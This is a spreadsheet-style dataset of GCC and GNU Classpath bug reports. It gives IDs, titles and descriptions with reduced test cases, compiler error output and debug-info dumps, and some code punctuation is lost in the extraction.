FAIL: 7.0.0 20160716 (experimental)
How reproducible:
Always.
Steps to Reproduce:
cat &gt;stringalloc.f90 &lt;&lt;EOH
program stringalloc
  character(len=:) target allocatable   :: var_char
  allocate(character(len=10) :: var_char)
  var_char = 'foo'
end program stringalloc
EOH
gfortran -o stringalloc stringalloc.f90 -Wall -ggdb ./stringalloc -batch -ex 'b 5' -ex r -ex 'ptype var_char'
Actual results:
type = PTR TO -&gt; ( character*1 )
 : Abbrev Number: 8 (DW_TAG_variable)
       DW_AT_name        : (indirect string offset: 0x111): var_char
       DW_AT_decl_file   : 1
       DW_AT_decl_line   : 2
       DW_AT_type        : 
       DW_AT_location    : 2 byte block: 91 68      (DW_OP_fbreg: -24)
 : Abbrev Number: 11 (DW_TAG_string_type)
 : Abbrev Number: 6 (DW_TAG_pointer_type)
       DW_AT_byte_size   : 8
       DW_AT_type        : 
Expected results:
type = PTR TO -&gt; ( character*10 )
 : Abbrev Number: 3 (DW_TAG_variable)
       DW_AT_name        : (indirect string offset: 0x111): var_char
       DW_AT_decl_file   : 1
       DW_AT_decl_line   : 2
       DW_AT_type        : 
       DW_AT_location    : 2 byte block: 91 68      (DW_OP_fbreg: -24)
 : Abbrev Number: 6 (DW_TAG_string_type)
       DW_AT_string_length: 2 byte block: 91 64     (DW_OP_fbreg: -28)
       DW_AT_byte_size   : 4
 : Abbrev Number: 7 (DW_TAG_pointer_type)
       DW_AT_byte_size   : 8
       DW_AT_type        : 
Additional info:
There is also some additional unknown DIE but that does not seem to be related:
 : Abbrev Number: 4 (DW_TAG_variable)
       DW_AT_name        : (indirect string offset: 0x110): .var_char
       DW_AT_type        : 
       DW_AT_artificial  : 1
       DW_AT_location    : 2 byte block: 91 64      (DW_OP_fbreg: -28)
 : Abbrev Number: 8 (DW_TAG_base_type)
       DW_AT_byte_size   : 4
       DW_AT_encoding    : 5        (signed)
       DW_AT_name        : (indirect string offset: 0xeb): integer(kind=4)
GDB above is Fedora gdb-7.11.1-75.fc24.x86_64 upstream GDB is not usable.
But readelf -wi is enough for analysis of this problem.</t>
  </si>
  <si>
    <t>GCC-71947</t>
  </si>
  <si>
    <t>[6 Regression] x ^ y not folded to 0 if x == y by DOM</t>
  </si>
  <si>
    <t>Hi
For the following case:
int f(int x int y)
{
  int ret
  if (x == y)
    ret = x ^ y
  else
    ret = 1
  return ret
}
x ^ y does not get folded to 0.
From the discussion in:
https://gcc.gnu.org/ml/gcc-patches/2016-07/msg00385.html
r233207 must have regressed this test-case.
Thanks
Prathamesh</t>
  </si>
  <si>
    <t>GCC-16631</t>
  </si>
  <si>
    <t>[4.0 Regression] Problems inlining with enums</t>
  </si>
  <si>
    <t>GCC-39431</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in spill_failure at reload1.c:2093</t>
  </si>
  <si>
    <t>seen when building the OpenJDK Zero port on ix86:
works when using -march=i486 instead of -march=i585.
$ g++-4.2 -c -march=i586 -g -O3 -fPIC -c jvm.ii
$ g++-4.3 -c -march=i586 -g -O3 -fPIC -c jvm.ii 
/scratch/packages/openjdk/u/openjdk-6-6b14-1.4.1/build-zero/openjdk/hotspot/src/share/vm/prims/jvm.cpp: In function 'jboolean JVM_CX8Field(JNIEnv* _jobject* _jfieldID* jlong jlong)':
/scratch/packages/openjdk/u/openjdk-6-6b14-1.4.1/build-zero/openjdk/hotspot/src/share/vm/prims/jvm.cpp:4206: error: unable to find a register to spill in class 'GENERAL_REGS'
/scratch/packages/openjdk/u/openjdk-6-6b14-1.4.1/build-zero/openjdk/hotspot/src/share/vm/prims/jvm.cpp:4206: error: this is the insn:
(insn:HI 71 68 72 11 /scratch/packages/openjdk/u/openjdk-6-6b14-1.4.1/build-zero/openjdk/hotspot/src/os_cpu/linux_zero/vm/atomic_linux_zero.inline.hpp:295 (parallel [
            (set (reg:DI 65 [ D.129908 ])
                (mem/v:DI (plus:SI (reg/f:SI 58 [ prephitmp.14780 ])
                        (reg/v/f:SI 71 [ fid ])) [-1 S8 A64]))
            (set (mem/v:DI (plus:SI (reg/f:SI 58 [ prephitmp.14780 ])
                        (reg/v/f:SI 71 [ fid ])) [-1 S8 A64])
                (unspec_volatile:DI [
                        (mem/v:DI (plus:SI (reg/f:SI 58 [ prephitmp.14780 ])
                                (reg/v/f:SI 71 [ fid ])) [-1 S8 A64])
                        (reg/v:DI 72 [ oldVal ])
                        (reg:SI 101 [ newVal ])
                        (reg:SI 102 [ newVal+4 ])
                    ] 10))
            (clobber (reg:CC 17 flags))
        ]) 1507 {*sync_double_compare_and_swapdi_pic} (expr_list:REG_DEAD (reg:SI 102 [ newVal+4 ])
        (expr_list:REG_DEAD (reg:SI 101 [ newVal ])
            (expr_list:REG_DEAD (reg/v/f:SI 71 [ fid ])
                (expr_list:REG_DEAD (reg/f:SI 58 [ prephitmp.14780 ])
                    (expr_list:REG_UNUSED (reg:CC 17 flags)
                        (nil)))))))</t>
  </si>
  <si>
    <t>CLASSPATH-22709</t>
  </si>
  <si>
    <t>MulticastSocket doesn't construct</t>
  </si>
  <si>
    <t xml:space="preserve">The problem can be correcting by fixing the implementation of DatagramSocket and using correctly the API for MulticastSocket.
Here is a Changelog entry:
        * java/net/DatagramSocket.java
java/net/MulticastSocket.java:
        (DatagramSocket(SocketAddress)) Fixed behaviour according to Java 1.4
        API
        (MulticastSocket) Fixed construction to request previously binded
        address.
        Reported by Everton da Silva Marques 
</t>
  </si>
  <si>
    <t>GCC-39065</t>
  </si>
  <si>
    <t>libiberty hashtab.c:hash_pointer() needs intptr_t</t>
  </si>
  <si>
    <t>in function hash_pointer() libiberty/hashtab.c casts its pointer argument
to long probably with the assumption that long is 64 bits on all 64 bit
systems which isn't true for win64. it must cast to intptr_t instead.
here is the warning:
../../../gcc-svn/libiberty/hashtab.c: In function 'hash_pointer':
../../../gcc-svn/libiberty/hashtab.c:199: warning: cast from pointer to integer of different size
(the patch should also be applied to binutils and gdb or whoever else uses
libiberty)</t>
  </si>
  <si>
    <t>GCC-14324</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Multiple static definitions are not unique</t>
  </si>
  <si>
    <t>Using gcc-3.4-20040225
If there are multiple occurrences of static variables with the same name 
(different scopes of course) inside a function marked extern C then the
names are not mangled nor made unique.  The following function demonstrates
this:
void fun1(void)
{
    do { static int xyz __attribute__((unused)) = 1 } while (0)
    do { static int xyz __attribute__((unused)) = 2 } while (0)
    do { static int xyz __attribute__((unused)) = 3 } while (0)
}
This generates the following:
        .align 2
        .type   _ZZ4fun1vE3xyz @object
        .size   _ZZ4fun1vE3xyz 4
_ZZ4fun1vE3xyz:
        .long   1
        .align 2
        .type   _ZZ4fun1vE3xyz_0 @object
        .size   _ZZ4fun1vE3xyz_0 4
_ZZ4fun1vE3xyz_0:
        .long   2
        .align 2
        .type   _ZZ4fun1vE3xyz_1 @object
        .size   _ZZ4fun1vE3xyz_1 4
_ZZ4fun1vE3xyz_1:
        .long   3
        .section        .text
        .align 2
        .globl _Z4fun1v
Whereas the same function marked extern C generates this:
        .align 2
        .type   _ZZ4fun1vE3xyz @object
        .size   _ZZ4fun1vE3xyz 4
_ZZ4fun1vE3xyz:
        .long   1
        .align 2
        .type   xyz @object
        .size   xyz 4
xyz:
        .long   2
        .align 2
        .type   xyz @object
        .size   xyz 4
xyz:
        .long   3
        .section        .text
        .align 2
        .globl fun1v
This of course generates an assembly error.
This used to work - at least as recently as GCC-3.3.3</t>
  </si>
  <si>
    <t>GCC-71435</t>
  </si>
  <si>
    <t>[7 regression] sparc bootstrap failure since r235625</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-7-20160605 on sparc-linux fails with:
Comparing stages 2 and 3
Bootstrap comparison failure!
gcc/ira.o differs
gcc/double-int.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/mnt/scratch/objdir7'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir7'
make: *** [bootstrap] Error 2
Last successful bootstrap was with gcc-7-20160424.  A bisection showed that the failure started with the reload1 patch in r235625.
Configured on sparc64-linux-gnu with:
/mnt/scratch/gcc-7-20160605/configure --prefix=/mnt/scratch/install7 --with-gmp=/home/mikpe/pkgs/linux-sparc64/gmp-6.1.0 --with-mpfr=/home/mikpe/pkgs/linux-sparc64/mpfr-3.1.4 --with-mpc=/home/mikpe/pkgs/linux-sparc64/mpc-1.0.3 --enable-multilib --disable-plugin --disable-lto --disable-nls --enable-threads=posix --enable-checking=release --disable-libmudflap --enable-languages=cc++ --build=sparc-unknown-linux --target=sparc-unknown-linux --with-cpu=ultrasparc --enable-targets=all</t>
  </si>
  <si>
    <t>GCC-39215</t>
  </si>
  <si>
    <t>Running Testsuite with Multilib Flags exposes many errors in Testsuite (and gcc)</t>
  </si>
  <si>
    <t>This comment ( http://gcc.gnu.org/bugzilla/show_bug.cgi?id=39150#c1 ) says:
How is this major this is an enhancement to the build system.  
i386-solaris is a multi arch target so it includes the x86_64 
solaris target also.
Attempts to run the Testsuite in 'Multilib-Mode' on the Target
i386-pc-solaris2.11 exposes many failures:
Results for 4.4.0 20090216 (experimental) [trunk revision 144203] (GCC) testsuite on i386-pc-solaris2.11
http://gcc.gnu.org/ml/gcc-testresults/2009-02/msg01622.html
Thanks
Rob
PS: I filed the ICE as a separate BUG.</t>
  </si>
  <si>
    <t>GCC-25792</t>
  </si>
  <si>
    <t>ICE in reload_cse_simplify_operands at postreload.c:391 for m68k/-Os</t>
  </si>
  <si>
    <t>attempting to cross-compile less-394 when i hit this:
lesskey.ii: In function `void tstr(char**)':
lesskey.ii:26: error: insn does not satisfy its constraints:
(insn 30 143 31 11 lesskey.ii:11 (set (reg/v:QI 0 %d0 [orig:32 ch ] [32])
        (plus:QI (mem:QI (reg:SI 8 %a0) [0 S1 A8])
            (reg:QI 0 %d0 [orig:33 ch+3 ] [33]))) 95 {addqi3} (insn_list 28 (nil))
    (nil))
lesskey.ii:26: internal compiler error: in reload_cse_simplify_operands at postreload.c:391
Please submit a full bug report
verified combinations:
  Gentoo x86_64 host / m68k target gcc-3.4.5
  Debian m68k host / m68k target gcc-3.3.5 gcc-3.4.4</t>
  </si>
  <si>
    <t>GCC-30054</t>
  </si>
  <si>
    <t>-Wc++-compat does not catch goto past initialization</t>
  </si>
  <si>
    <t>gcc -Wc++-compat is quiet about goto crossing/skipping initialization.
g++ says they are errors.
bash$ cat a.c
    void foo(void)
    {
	{
            goto bar
            int i = 0		// C++ error
	    { int j = 0 }	// Not C++ error (just for comparison)
        bar:
            return
	}
	goto bar
    }
bash$ gcc -fsyntax-only -Wc++-compat a.c
bash$ g++ -fsyntax-only a.c
a.c: In function 'void foo()':
a.c:7: error: jump to label 'bar'
a.c:4: error:   from here
a.c:5: error:   crosses initialization of 'int i'
a.c:7: error: jump to label 'bar'
a.c:10: error:   from here
a.c:5: error:   skips initialization of 'int i'</t>
  </si>
  <si>
    <t>GCC-47372</t>
  </si>
  <si>
    <t>[x32] internal compiler error: in simplify_subreg at simplify-rtx.c:5222</t>
  </si>
  <si>
    <t>On x32 branch I got
[hjl@gnu-6 ilp32-10]$ cat x.i
typedef struct FILE FILE
int _fwalk(int (*)(FILE *))
int __sflush(FILE *)
int
fflush(FILE *fp)
{
  return (_fwalk(__sflush))
}
[hjl@gnu-6 ilp32-10]$ make
/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/ -S -o x.s -mx32 -O -g -fPIC -dp  x.i
x.i: In function \u2018fflush\u2019:
x.i:8:1: internal compiler error: in simplify_subreg at simplify-rtx.c:5222
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [x.s] Error 1
[hjl@gnu-6 ilp32-10]$</t>
  </si>
  <si>
    <t>GCC-11420</t>
  </si>
  <si>
    <t>[3.3/3.4 regression][x86_64] gcc generates invalid asm code when -O -fPIC is used (suffix or operands invalid for `movabs')</t>
  </si>
  <si>
    <t>Reproducible: 100%
To reproduce run gcc -O -fPIC -c bug.c (I will attach a small self-contained
bug.c shortly).
Expected: it compiles (or produces an error message if the source is not a valid
C program).
Actual:
/tmp/ccMEmtFi.s: Assembler messages:
/tmp/ccMEmtFi.s:14: Error: suffix or operands invalid for `movabs'
Exit 1
This bug comes up when trying to compile OCaml (current CVS head) on x86_64
under a recent Red Hat Rawhide tree.
Note that both -O and -fPIC options are necessary to reproduce (without one or
both of them the file compiles fine).
% gcc -v
Reading specs from /usr/lib/gcc-lib/x86_64-redhat-linux/3.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--disable-checking --with-system-zlib --enable-__cxa_atexit
--host=x86_64-redhat-linux
Thread model: posix
gcc version 3.3 20030623 (Red Hat Linux 3.3-12)
I also reported this to Red Hat - see
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=98518</t>
  </si>
  <si>
    <t>gcc-bugs</t>
  </si>
  <si>
    <t>GCC-34392</t>
  </si>
  <si>
    <t>BOZ diagnost invalid Fortran 2003 use with -std=f2003 warnings</t>
  </si>
  <si>
    <t>This assumes that the patch http://gcc.gnu.org/ml/fortran/2007-12/msg00075.html has been applied. It fixes most PR 34342 PR 34345 PR 18026 and PR 29471.
Missing:
-std=f2003 does not detect most invalid BOZ only (i) BOZ for non-integers in DATA statements and (ii) in assignments () are detected.</t>
  </si>
  <si>
    <t>GCC-65395</t>
  </si>
  <si>
    <t>[4.9 Regression] compiler crash -ftree-pre leads to SSA corruption</t>
  </si>
  <si>
    <t>Created attachment 35015
code to reproduce compiler crash
The attached very contrived code has gcc crashing with
gcc -c -O3 orwl_proc_symbols-prepro.c
the code compiles fine with
gcc -c -O3 -fno-tree-pre orwl_proc_symbols-prepro.c
As indicated the code is very contrived and the result of reducing a complicated macro expanded code to a minimal example. So the one I give here seems to be minimal to reproduce the crash. It has
 - nested for loops of a depth 15 or so
 - uses setjmp (but no longjmp)
 - uses an inline function that does not much but calling a _Noreturn function conditionally
without any of these components the bug goes away ...
BTW I observed the bug already for earlier versions of gcc 4.9. gcc 4.8 works fine. My system is a x86_64 with debian jessie nothing fancy.</t>
  </si>
  <si>
    <t>jens.gustedt</t>
  </si>
  <si>
    <t>GCC-17161</t>
  </si>
  <si>
    <t>failure to diagnose an ill-formed instantiation on a local type</t>
  </si>
  <si>
    <t>Gcc 3.4 fails to diagnose the following ill-formed program.
$ cat t.cpp &amp;&amp; g++ --version &amp;&amp; g++ t.cpp -Wextra -W -pedantic
struct S {
    void foo (unsigned long) { }
    template  void foo (T) { }
}
int main ()
{
    enum E { e }
    S ().foo (e)   // local types are not allowed as template arguments
}
g++ (GCC) 3.4.0
Copyright (C) 2004 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>GCC-40851</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5] problem with deallocation of pointers</t>
  </si>
  <si>
    <t>gfortran seems to deallocate a pointer which was not allocated or need not be allocated. The program below compiles but when executed returns the following error message:
a.out(8814) malloc: *** error for object 0x1fa2: Non-aligned pointer being freed
*** set a breakpoint in malloc_error_break to debug
Bus error
(Happens for Linux x86 and x86-64 as well as MAC OS X)
The code is:
program main
  type :: string
     characterdimension(:)allocatable :: chars
  end type string
  type :: string_container
     type(string) :: string
  end type string_container
  type(string_container) pointer :: ptr
  call set_ptr (ptr)
contains
  subroutine set_ptr (ptr)
    type(string_container) pointer intent(out) :: ptr
    ptr =&gt; null ()
  end subroutine set_ptr
end program main</t>
  </si>
  <si>
    <t>GCC-47220</t>
  </si>
  <si>
    <t>[C++0x] no error on unterminated template argument list for variadic parameter</t>
  </si>
  <si>
    <t>----- testcase.C -----
template  struct A
struct B : A &lt;
{
}
----------------------
(note the A &lt;)
Compiler output:
$ gcc -std=c++0x testcase.C -c
(no output)
Tested revisions:
r168552 - accepted
4.5 r168062 - accepted
4.4 r168062 - accepted
4.3.5 - accepted</t>
  </si>
  <si>
    <t>GCC-43538</t>
  </si>
  <si>
    <t>config/mt-gnu CXXFLAGS_FOR_TARGET</t>
  </si>
  <si>
    <t>The file config/mt-gnu currently defines CXXFLAGS_FOR_TARGET =
$(CXXFLAGS) -D_GNU_SOURCE.  To me it seems that it should be +=
-D_GNU_SOURCE (like most of the other frags).  Otherwise I cannot
override the CXXFLAGS without overriding CXXFLAGS_FOR_TARGET etc.</t>
  </si>
  <si>
    <t>dougsemler</t>
  </si>
  <si>
    <t>GCC-23380</t>
  </si>
  <si>
    <t>[mingw32] cpu_time intrinsic malfunction</t>
  </si>
  <si>
    <t>The gfortran intrinsic function cpu_time(x) does not measure cpu time - it 
always produces 0.0 (zero) as the result.
I am using Native Windows build: download the latest installer (2005-08-06) 
from http://gcc.gnu.org/wiki/GFortranBinaries and am running under Windows XP 
Professional.</t>
  </si>
  <si>
    <t>edunlop</t>
  </si>
  <si>
    <t>GCC-33707</t>
  </si>
  <si>
    <t>scev not handling unsigned conversion</t>
  </si>
  <si>
    <t>Dependency checker fails to build distance vector for the following example:
int
foo (char *a unsigned n)
{
    int i
    a[0] = 0
    for (i = 16 i &lt; n i++)
      a[i] = a[i-16]
}
Compiled with 
gcc -O2 -ftree-vectorize -maltivec -fdump-tree-vect-details -S t.c
From the vectorizer dump:
...
  (overlap_iterations_b = not known
)
)
(dependence classified: scev_not_known)
)
)
...
However it succeeds to calculate distance vector if number of iterations is known constant:
int
foo (char *a unsigned n)
{
    int i
    a[0] = 0
    for (i = 16 i &lt; 128 i++)
    {
      a[i] = a[i-16]
    }
}
From dump of vectorizer:
....
)
(build_classic_dist_vector
  dist_vector = ( 16
  )
)
)
)
....
-- Victor</t>
  </si>
  <si>
    <t>GCC-1000</t>
  </si>
  <si>
    <t xml:space="preserve"> problem ICE on legal</t>
  </si>
  <si>
    <t>Attempting to compile the attached file produces the following
error reports ending with an ICE..
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -trigraphs\
 -$ -D__STRICT_ANSI__ -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__\
=0 -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Wall -p\
edantic -Acpu(i386) -Amachine(i386) -D__i386 -D__i386__ -D__tune_i386__ bug2.C \
bug2.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus bug2.ii -quiet -dumpbase bug2.\
C -ansi -Wall -pedantic -ansi -version -o bug2.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled \
by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
bug2.C: In function `double mantissa (const ZZ &amp;)':
bug2.C:41: `pow' undeclared (first use this function)
bug2.C:41: (Each undeclared identifier is reported only once for each
function it appears in.)
bug2.C:38: warning: unused variable `long int log2'
bug2.C:39: warning: unused variable `long int w'
bug2.C:42: Internal compiler error in subst_stack_regs_pat at
reg-stack.c:1395
Release:
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
uname -a
Linux poly.dima.unige.it 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
How-To-Repeat:
g++ -v -save-temps -Wall -pedantic -ansi bug2.C</t>
  </si>
  <si>
    <t>abbott</t>
  </si>
  <si>
    <t>GCC-3459</t>
  </si>
  <si>
    <t>Cannot build powerpc-unknown-linux-gnu cross compiler</t>
  </si>
  <si>
    <t xml:space="preserve">	I am trying to build a cross compiler. Host is i686-pc-linux-gnu
	target is powerpc-unknown-linux-gnu. I configured an built using
	the following script:
	---Start of script ---
	#! /bin/bash
	declare -r GCCVERSION=3.0
	declare -r SRCPATH=$CROSS_DEVEL_HOME/src/gcc-$GCCVERSION
	declare -r BUILDPATH=$CROSS_DEVEL_HOME/ppc/tools/gcc-$GCCVERSION
	declare -r HOSTARCH=i686-pc-linux-gnu
	declare -r TARGETARCH=powerpc-unknown-linux-gnu
	declare -r TARGETPATH=/usr
	declare -rx CC=/usr/bin/gcc
	declare -rx CFLAGS=-pipe
	declare -rx XCFLAGS=-O3 -march=i686 -fomit-frame-pointer -g0
	declare -rx TCFLAGS=-O3
	cd ${BUILDPATH}
	rm -rf *
	${SRCPATH}/configure --host=${HOSTARCH} --target=${TARGETARCH} --prefix=${TARGETPATH} \
        --with-cpu=603e --enable-languages=c --with-gnu-as --with-gnu-ld
	make all-gcc | tee make.log
	---End of script---
	During compilation of toplevel.c gcc aborts:
	---Start of make output---
	/usr/bin/gcc -DCROSS_COMPILE -DIN_GCC    -pipe -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H    -I. -I. -I/home/thomas/cross-devel/src/gcc-3.0/gcc -I/home/thomas/cross-devel/src/gcc-3.0/gcc/. -I/home/thomas/cross-devel/src/gcc-3.0/gcc/config -I/home/thomas/cross-devel/src/gcc-3.0/gcc/../include  \
	  -DTARGET_NAME=\powerpc-unknown-linux-gnu\ \
	  -c /home/thomas/cross-devel/src/gcc-3.0/gcc/toplev.c
	/home/thomas/cross-devel/src/gcc-3.0/gcc/toplev.c: In function `compile_file':
	/home/thomas/cross-devel/src/gcc-3.0/gcc/toplev.c:2293: floating constant exponent has no digits
	/home/thomas/cross-devel/src/gcc-3.0/gcc/toplev.c: In function `main':
	/home/thomas/cross-devel/src/gcc-3.0/gcc/toplev.c:4912: floating constant exponent has no digits
	---End of make output---
Release:
3.0
Environment:
System: Linux sarkovy.koeller.org 2.4.5 #3 Mon Jun 11 23:20:37 CEST 2001 i686 unknown
Architecture: i686
	target: powerpc-unknown-linux-gnu
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: powerpc-unknown-linux-gnu
configured with: /var/src/gnu/gcc-3.0/configure --prefix=/usr --with-gnu-as --with-gnu-ld --enable-threads --enable-languages=cc++
How-To-Repeat:
	Create a suitable setup and execute the script above.</t>
  </si>
  <si>
    <t>tkoeller</t>
  </si>
  <si>
    <t>GCC-36806</t>
  </si>
  <si>
    <t>[4.4 Regression] I/Os hang at rev. 137631 on darwin9</t>
  </si>
  <si>
    <t>Starting from revision 137644 up to 137712 (137615 is working) unformatted IOs in FORTRAN give hanging executables. For instance the executable from the following code
       data=-1
!       print * 'before'
       write(11) data
!       print * 'after'
       end
hangs after creating an empty fort.11 file:
[ibook-dhum] f90/bug% time a.out
^C0.000u 0.002s 0:51.34 0.0%    0+0k 0+1io 0pf+0w
If I compile the code with gfortran 4.3.1 and -S then compile the assembly with gfortran 4.4.0 I get:
Bus error
0.000u 0.002s 0:00.91 0.0%      0+0k 0+1io 0pf+0w
The crash occurs in MAIN__ ()
(gdb) s
main (argc=1 argv=0xbfffdb98) at ../../../gcc-4.4-work/libgfortran/fmain.c:21
21        MAIN__ ()
(gdb) s
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x00000000 in ?? ()
Now if I compile with gfortran 4.4.0 and -S then compile the assembly with gfortran 4.3.1 the executable gives the right fort.11 file.
So it seems that that something is miscompiled in libgfortran. Could it be related to pr36765?</t>
  </si>
  <si>
    <t>GCC-45028</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE building 64-bit libjava on Solaris 2/SPARC: output_operand: invalid expression as operand</t>
  </si>
  <si>
    <t>This patch
2010-07-20  Jakub Jelinek  
	* var-tracking.c (vt_expand_loc vt_expand_loc_dummy): Bump maximum
	depth to 8 from 5.
broke sparc-sun-solaris2.* bootstrap building 64-bit libjava:
$ /var/gcc/gcc-4.6.0-20100721/11-gcc-gas/./gcc/gcj -B/var/gcc/gcc-4.6.0-20100721/11-gcc-gas/sparc-sun-solaris2.11/sparcv9/libjava/ -B/var/gcc/gcc-4.6.0-20100721/11-gcc-gas/sparc-sun-solaris2.11/sparcv9/libjava/ -B/var/gcc/gcc-4.6.0-20100721/11-gcc-gas/./gcc/ -B/usr/local/sparc-sun-solaris2.11/bin/ -B/usr/local/sparc-sun-solaris2.11/lib/ -isystem /usr/local/sparc-sun-solaris2.11/include -isystem /usr/local/sparc-sun-solaris2.11/sys-include -m64 -Usun -fclasspath= -fbootclasspath=/vol/gcc/src/hg/trunk/solaris/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2 -m64 -c -fsource-filename=/var/gcc/gcc-4.6.0-20100721/11-gcc-gas/sparc-sun-solaris2.11/sparcv9/libjava/classpath/lib/classes -MT gnu/javax/print/ipp/attribute/defaults.lo -MD -MP -MF gnu/javax/print/ipp/attribute/defaults.deps @gnu/javax/print/ipp/attribute/defaults.list -o gnu/javax/print/ipp/attribute/defaults.o
jc1: internal compiler error: output_operand: invalid expression as operand
This happens only for the non-PIC case.</t>
  </si>
  <si>
    <t>GCC-53002</t>
  </si>
  <si>
    <t>Request new specs string token for multilib_os_dir</t>
  </si>
  <si>
    <t>Created attachment 27163
Add %M spec string token
In the GCC FAQ under Dynamic linker is unable to find GCC libraries one suggestion is to add '-R' or '-rpath' linker option to the *link or *lib specs
so that the GCC libraries can be found.
E.G. the following line is added to the DRIVER_DEFINES when building gcc
via pkgsrc ('$(LINKER_RPATH_FLAG)' comes from the environment):
  -DLINK_LIBGCC_SPEC=\%D $(LINKER_RPATH_FLAG)$(libdir) \
This is needed as the prefix is normally something like '/usr/pkg/gcc47'.
The problem is that this does not allow for multilib os directory's and
there is currently no simple way of dong so.
My solution is to add the '%M' token that expands to multilib_os_dir.
The above line can then be easily change to handle multilib directory's:
  -DLINK_LIBGCC_SPEC=\%D $(LINKER_RPATH_FLAG)$(libdir)/%M \</t>
  </si>
  <si>
    <t>sbd</t>
  </si>
  <si>
    <t>GCC-12570</t>
  </si>
  <si>
    <t>G++ fails to accept a legal struct declaration in a namespace</t>
  </si>
  <si>
    <t>Under certain circumstance g++ fails to accept a legal C-style struct declaration in namespace for example:
#include   // complex is defined here but under namespace std
namespace f2c {
  typedef struct { real r i } complex // *GCC SAYS ERROR
}
GCC gives the following error on the ERROR line above:
error: semicolon missing after struct declaration
error: abstract declarator `f2c::' used as declaration
error: namespace-scope anonymous aggregates must be static
Somehow this only happens when the source code is very complex. I will send you a (preprocessed) sample code that cause G++ to stumble. Or send me an email for the code if the attachment does not appear soon.</t>
  </si>
  <si>
    <t>GCC-40784</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 149725 caused autoconf warning in libstdc++</t>
  </si>
  <si>
    <t>Revision 149725:
http://gcc.gnu.org/ml/gcc-cvs/2009-07/msg00606.html
caused:
[hjl@gnu-6 libstdc++-v3]$ autoconf-2.59
configure.ac:178: warning: GCC_NO_EXECUTABLES invoked multiple times
/export/redhat/rpms/BUILD/autoconf-2.59/tests/../lib/autoconf/general.m4:2213: AC_LINK_IFELSE is expanded from...
/export/redhat/rpms/BUILD/autoconf-2.59/tests/../lib/autoconf/general.m4:2271: AC_RUN_IFELSE is expanded from...
/export/redhat/rpms/BUILD/autoconf-2.59/tests/../lib/autoconf/general.m4:1792: AC_CACHE_VAL is expanded from...
/export/redhat/rpms/BUILD/autoconf-2.59/tests/../lib/autoconf/general.m4:1805: AC_CACHE_CHECK is expanded from...
../config/tls.m4:2: GCC_CHECK_TLS is expanded from...
configure.ac:178: the top level
configure.ac:247: warning: GCC_NO_EXECUTABLES invoked multiple times
crossconfig.m4:5: GLIBCXX_CROSSCONFIG is expanded from...
configure.ac:247: the top level
[hjl@gnu-6 libstdc++-v3]$ 
in libstdc++-v3</t>
  </si>
  <si>
    <t>GCC-72749</t>
  </si>
  <si>
    <t>[7 Regression] ICE: verify_flow_info failed (error: wrong amount of branch edges after conditional jump in bb 5) w/ -O2 -fsched2-use-superblocks</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20160724 fails to compile the following reduced testcase for 32-bit BE powerpc target w/ -O2 (-O3 -Ofast) -fsched2-use-superblocks -mcpu=power7 (power8 powerpc64le):
int as
void
ji (int *x4)
{
  if (0)
    {
      unsigned int pv
      while (as &lt; 0)
        {
          for (*x4 = 0 *x4 &lt; 1 ++(*x4))
yj:
            x4 = (int *)
          ++as
        }
    }
  goto yj
}
% powerpc-e300c3-linux-gnu-gcc-7.0.0-alpha20160724 -c -O2 -fsched2-use-superblocks dao4bxj1.c
(or
% powerpc-e500v2-linux-gnuspe-gcc-7.0.0-alpha20160724 -c -mcpu=power7 -Ofast -fsched2-use-superblocks -w dao4bxj1.c)
dao4bxj1.c: In function 'ji':
dao4bxj1.c:19:1: error: wrong amount of branch edges after conditional jump in bb 5
 }
 ^
dao4bxj1.c:19:1: internal compiler error: verify_flow_info failed</t>
  </si>
  <si>
    <t>GCC-52026</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] Constexpr Variable Appears Uninitialized in Lambda</t>
  </si>
  <si>
    <t>Created attachment 26487
The code sample exhibiting the suspected bug.
Hello everyone
In the code fragment below g++ (4.6.1 on Linux Mint 64-bit) complains that x is uninitialized in the lambda function and prints out an initialized value from the stack for the last three lines of the program's output. I'd except all four lines of the output to be '5' so I suspect that this may be a compiler bug.
